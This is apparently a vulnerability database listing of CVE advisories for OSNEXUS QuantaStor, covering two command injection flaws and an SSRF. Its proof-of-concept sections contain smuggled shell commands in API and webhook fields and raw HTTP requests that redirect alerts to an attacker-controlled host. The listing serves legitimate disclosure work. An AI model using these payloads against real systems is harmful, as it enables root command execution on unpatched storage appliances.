Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
8 vulnerabilities by OSNEXUS
CVE-2021-42081 (GCVE-0-2021-42081)
Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI?
Title
Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Summary
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Severity ?
9.1 (Critical)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OSNEXUS | QuantaStor |
Affected:
0 , < 6.0.0.355
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:25.989Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-42081"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-42081",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-12T14:14:48.828227Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-12T14:15:41.770Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003ctt\u003ehttp://\u0026lt;IP_ADDRESS\u0026gt;/qstorapi/storageSystemModify?storageSystem=\u0026amp;newName=quantastor\u0026amp;newDescription=;ls${IFS}-al\u0026amp;newLocation=4\u0026amp;newEnclosureLayoutId=5\u0026amp;newDnsServerList=;ls${IFS}-al\u0026amp;externalHostName=\u0026amp;newNTPServerList=;ls${IFS}-al\u003c/tt\u003e"
}
],
"value": "An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.\n\nPOC\nhttp://\u003cIP_ADDRESS\u003e/qstorapi/storageSystemModify?storageSystem=\u0026newName=quantastor\u0026newDescription=;ls${IFS}-al\u0026newLocation=4\u0026newEnclosureLayoutId=5\u0026newDnsServerList=;ls${IFS}-al\u0026externalHostName=\u0026newNTPServerList=;ls${IFS}-al"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T06:40:06.104Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory",
"technical-description",
"exploit"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"technical-description",
"exploit"
],
"url": "https://csirt.divd.nl/CVE-2021-42081"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-42081",
"datePublished": "2023-07-10T06:29:48.514Z",
"dateReserved": "2021-10-07T17:12:57.678Z",
"dateUpdated": "2025-09-22T06:40:06.104Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-4406 (GCVE-0-2021-4406)
Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-24 15:46
VLAI?
Title
Authenticated Remote COmmand Execution as root in OSNEXUS QuantaStor version 6.0.0.355 and others
Summary
An authenticated attacker is able to create alerts that trigger a stored XSS attack.
POC
* go to the alert manager
* open the ITSM tab
* add a webhook with the URL/service token value
' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters)
* click add
* click apply
* create a test alert
* The test alert will run the command
“id | tee /tmp/ttttttddddssss” as root.
* after the test alert inspect
/tmp/ttttttddddssss it'll contain the ids of the root user.
Severity ?
9.1 (Critical)
CWE
- CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OSNEXUS | QuantaStor |
Affected:
0 , ≤ 6.0.0.355
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:23:10.705Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-4406"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-4406",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-24T13:40:31.901830Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-24T13:40:46.757Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://csirt.divd.nl/cves/CVE-2021-4406/"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThanOrEqual": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authenticated attacker is able to create alerts that trigger a stored XSS attack.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003col\u003e\u003cli\u003e\u003cp\u003ego to the alert manager\u003c/p\u003e\u003c/li\u003e\u003cli\u003eopen the ITSM tab\u003c/li\u003e\u003cli\u003e\u003cp\u003eadd a webhook with the URL/service token value \u003c/p\u003e\u003ctt\u003e\u0027\t-h\t\u0026amp;\u0026amp;\tid\t|\ttee\t/tmp/ttttttddddssss\t#\u0027\u003c/tt\u003e\u003cp\u003e (whitespaces are tab characters)\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003eclick add\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003eclick apply\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003ecreate a test alert\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003eThe test alert will run the command \u003c/p\u003e\u003ctt\u003e\u201cid\t|\ttee\t/tmp/ttttttddddssss\u201d\u003c/tt\u003e\u003cp\u003e as root.\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003eafter the test alert inspect \u003c/p\u003e\u003ctt\u003e/tmp/ttttttddddssss\u003c/tt\u003e\u003cp\u003e it\u0027ll contain the ids of the root user.\u003cbr\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cb\u003e\u003c/b\u003e\u003cbr\u003e"
}
],
"value": "An authenticated attacker is able to create alerts that trigger a stored XSS attack.\n\nPOC\n\n\n * go to the alert manager\n\n\n * open the ITSM tab\n * add a webhook with the URL/service token value \n\n\u0027\t-h\t\u0026\u0026\tid\t|\ttee\t/tmp/ttttttddddssss\t#\u0027 (whitespaces are tab characters)\n\n\n * click add\n\n\n * click apply\n\n\n * create a test alert\n\n\n * The test alert will run the command \n\n\u201cid\t|\ttee\t/tmp/ttttttddddssss\u201d as root.\n\n\n * after the test alert inspect \n\n/tmp/ttttttddddssss it\u0027ll contain the ids of the root user."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-77",
"description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-24T15:46:35.837Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"exploit",
"technical-description"
],
"url": "https://csirt.divd.nl/CVE-2021-4406"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor and hope it is fixed"
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor and hope it is fixed"
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "Authenticated Remote COmmand Execution as root in OSNEXUS QuantaStor version 6.0.0.355 and others",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-4406",
"datePublished": "2023-07-10T06:29:48.698Z",
"dateReserved": "2023-07-05T15:24:56.556Z",
"dateUpdated": "2025-09-24T15:46:35.837Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-42079 (GCVE-0-2021-42079)
Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI?
Title
SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Summary
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.
POC
Step 1: Prepare the SSRF with a request like this:
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0
Step 2: Trigger this alert with this request
GET /qstorapi/alertRaise?title=test&message=test&severity=1
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1
The post request received by <TARGET> looks like this:
{
### Python FLASK stuff ####
'endpoint': 'index',
'method': 'POST',
'cookies': ImmutableMultiDict([]),
### END Python FLASK stuff ####
'data': b'{
"attachments": [
{
"fallback": "[122] test / test.",
"color": "#aa2222",
"title": "[122] test",
"text": "test",
"fields": [
{
"title": "Alert Severity",
"value": "CRITICAL",
"short": false
}, {
"title": "Appliance",
"value": "quantastor (https://<HOSTNAME>)",
"short": true
}, {
"title": "System / Driver / Kernel Ver",
"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
"short": false
}, {
"title": "System Startup",
"value": "Fri Aug 6 16-02-55 2021",
"short": true
}, {
"title": "SSID",
"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
"short": true
},
],
"footer": "QuantaStor Call-home Alert",
"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
"ts": 1628461774
}
],
"mrkdwn":true
}',
#### FLASK REQUEST STUFF #####
'headers': {
'Host': '<redacted>',
'User-Agent': 'curl/7.58.0',
'Accept': '*/*',
'Content-Type': 'application/json',
'Content-Length': '790'
},
'args': ImmutableMultiDict([]),
'form': ImmutableMultiDict([]),
'remote_addr': '217.103.63.173',
'path': '/payload/58',
'whois_ip': 'TNF-AS, NL'
}
#### END FLASK REQUEST STUFF #####
Severity ?
6.2 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OSNEXUS | QuantaStor |
Affected:
0 , < 6.0.0.355
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:25.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-42079"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-42079",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-04T20:06:08.530050Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T20:06:17.817Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.osnexus.com/downloads",
"defaultStatus": "unknown",
"platforms": [
"Windows",
"Linux"
],
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eStep 1: Prepare the SSRF with a request like this:\u003cbr\u003e\u003cbr\u003e\u003ctt\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026amp;smtpServerIpAddress=BURPCOLLABHOST\u0026amp;smtpServerPort=25\u0026amp;smtpUsername=a\u0026amp;smtpPassword=1\u0026amp;smtpAuthType=1\u0026amp;customerSupportEmailAddress=1\u0026amp;poolFreeSpaceWarningThreshold=1\u0026amp;poolFreeSpaceAlertThreshold=1\u0026amp;poolFreeSpaceCriticalAlertThreshold=1\u0026amp;pagerDutyServiceKey=1\u0026amp;slackWebhookUrl=\u003c/span\u003ehttp://\u0026lt;target\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\u0026amp;enableAlertTypes\u0026amp;enableAlertTypes=1\u0026amp;disableAlertTypes=1\u0026amp;pauseAlertTypes=1\u0026amp;mattermostWebhookUrl=\u003c/span\u003ehttp://\u0026lt;TARGET\u0026gt;\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\nAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\u003cbr\u003e\nConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 0\u003c/span\u003e\u003c/tt\u003e\u003cbr\u003e\u003ctt\u003e\u003cbr\u003eStep 2: Trigger this alert with this request\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertRaise?title=test\u0026amp;message=test\u0026amp;severity=1 \u003cbr\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\n\u003cbr\u003eAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\u003cbr\u003eConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 1\u003cbr\u003e\u003cbr\u003e\u003c/span\u003e\u003c/tt\u003eThe post request received by \u0026lt;TARGET\u0026gt; looks like this:\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e{\u003cbr\u003e\u2003\n### Python FLASK stuff ####\n\u003cbr\u003e\u2003\u0027endpoint\u0027: \u0027index\u0027, \u003cbr\u003e\u2003\n\u0027method\u0027: \u0027POST\u0027, \u003cbr\u003e\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\n### END Python FLASK stuff ####\n\u003cbr\u003e\u2003\n\u0027data\u0027: b\u0027{ \u003cbr\u003e\u2003\u2003\"attachments\": [ \u003cbr\u003e\u2003\u2003\u2003{\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"text\": \"test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fields\": [ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (\u003c/span\u003ehttps://\u0026lt;HOSTNAME\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e)\",\n \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u0026nbsp;6 16-02-55 2021\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003 }, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003},\u003cbr\u003e\u2003\u2003\u2003\u2003],\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer_icon\": \"\u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\"\u003ehttps://platform.slack-edge.com/img/default_application_icon.png\u003c/a\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"ts\": 1628461774\u003cbr\u003e\u2003\u2003\u2003}\u003cbr\u003e\u2003\u2003], \u003cbr\u003e\u2003\u2003\"mrkdwn\":true \u003cbr\u003e\u2003}\u0027, \u003cbr\u003e\u2003#### FLASK REQUEST STUFF #####\n\u003cbr\u003e\u2003\u0027headers\u0027: {\n\u003cbr\u003e\u2003\u2003\u0027Host\u0027: \u0027\u0026lt;redacted\u0026gt;\u0027, \u003cbr\u003e\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \u003cbr\u003e\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\u003cbr\u003e\u2003}, \u003cbr\u003e\u2003\u0027args\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027form\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \u003cbr\u003e\u2003\u0027path\u0027: \u0027/payload/58\u0027, \u003cbr\u003e\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\u003cbr\u003e}\n\u003cbr\u003e#### END FLASK REQUEST STUFF #####\u003c/span\u003e\u003ctt\u003e\u003c/tt\u003e"
}
],
"value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by \u003cTARGET\u003e looks like this:\n{\n\u2003\n### Python FLASK stuff 